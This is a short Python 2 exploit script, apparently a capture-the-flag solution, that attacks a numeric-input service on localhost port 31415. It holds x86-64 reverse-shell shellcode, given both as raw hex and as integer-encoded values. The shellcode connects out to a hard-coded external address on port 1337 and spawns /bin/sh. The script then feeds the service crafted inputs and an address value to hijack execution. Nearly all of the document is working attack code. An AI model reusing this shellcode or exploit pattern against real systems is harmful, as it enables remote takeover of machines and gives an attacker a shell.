#!/usr/bin/python
import socket
import struct

host='127.0.0.1'
port=31415

sc="\x48\x31\xC0\x99\xEB\x02\x6A\x01\x5E\x90\xEB\x02\x6A\x02\x5F\x90\xEB\x02\xB0\x29\x0F\x05\xEB\x02\xB2\x10\x90\x90\xEB\x02\x66\x68\xDC\x1E\xEB\x02\x66\x6A\x4E\x90\xEB\x02\x66\x68\x05\x39\xEB\x02\x66\x6A\x02\x90\xEB\x02\x54\x5E\x50\x5F\xEB\x02\xB0\x2A\x0F\x05\xEB\x02\x6A\x03\x5E\x90\xEB\x02\x48\xFF\xCE\x90\xEB\x02\xB0\x21\x0F\x05\xEB\x02\x48\xFF\xCE\x90\xEB\x02\xB0\x21\x0F\x05\xEB\x02\x48\xFF\xCE\x90\xEB\x02\xB0\x21\x0F\x05\xEB\x02\x66\x6A\x68\x90\xEB\x02\x66\x68\x2F\x73\xEB\x02\x66\x68\x69\x6E\xEB\x02\x66\x68\x2F\x62\xEB\x02\x54\x5F\x99\x52\xEB\x02\x57\x54\x5E\x90\xEB\x02\xB0\x3B\x0F\x05\xEB\x02"


sc="\x48\x31\xC0\x99\xEB\x02\x6A\x01\x5E\x90\xEB\x02\x6A\x02\x5F\x90\xEB\x02\xB0\x29\x0F\x05\xEB\x02\xB2\x10\x90\x90\xEB\x02\x66\x68\xDC\x1E\xEB\x02\x66\x68\x4E\x2F\xEB\x02\x66\x68\x05\x39\xEB\x02\x66\x6A\x02\x90\xEB\x02\x54\x5E\x50\x5F\xEB\x02\xB0\x2A\x0F\x05\xEB\x02\x6A\x03\x5E\x90\xEB\x02\x48\xFF\xCE\x90\xEB\x02\xB0\x21\x0F\x05\xEB\x02\x48\xFF\xCE\x90\xEB\x02\xB0\x21\x0F\x05\xEB\x02\x48\xFF\xCE\x90\xEB\x02\xB0\x21\x0F\x05\xEB\x02\x66\x6A\x68\x90\xEB\x02\x66\x68\x2F\x73\xEB\x02\x66\x68\x69\x6E\xEB\x02\x66\x68\x2F\x62\xEB\x02\x54\x5F\x99\x52\xEB\x02\x57\x54\x5E\x90\xEB\x02\xB0\x3B\x0F\x05\xEB\x02"


sc = [
 '563351318431273',
 '2253405195010229',
 '2253405195043125',
 '281675503301275',
 '2253405196650585',
 '2253403992372275',
 '2253405196105011',
 '2253404462298163',
 '2253405192009011',
 '1126702391760789',
 '281675503301291',
 '2253405195010485',
 '563351299678185',
 '281675503301147',
 '563351299678185',
 '281675503301147',
 '563351299678185',
 '281675503301147',
 '2253405195351347',
 '2253404950213683',
 '2253404910171187',
 '2253404807607347',
 '1126702338430933',
 '4506810390041687',
 '281675503301563'
]
# '4503599627371243']

sc=['563351318431273',
 '2253405195010229',
 '2253405195043125',
 '281675503301275',
 '2253405196650585',
 '2253404242850867',
 '2253404380804147',
 '2253404462298163',
 '2253405192009011',
 '1126702391760789',
 '281675503301291',
 '2253405195010485',
 '563351299678185',
 '281675503301147',
 '563351299678185',
 '281675503301147',
 '563351299678185',
 '281675503301147',
 '2253405195351347',
 '2253404950213683',
 '2253404910171187',
 '2253404807607347',
 '1126702338430933',
 '4506810390041687',
 '281675503301563']
# '4503599627371243']

# '4503599627371243']


s=socket.socket()
s.connect((host,port))
print len(sc)
for i in sc:
	print i
	s.send(i+'\n')
s.send('c\n')
s.send('b\n'*38)
addr='3.1146294e-317'
s.send(addr+'\n')
raw_input()
s.send('.'+'\n')
s.close()
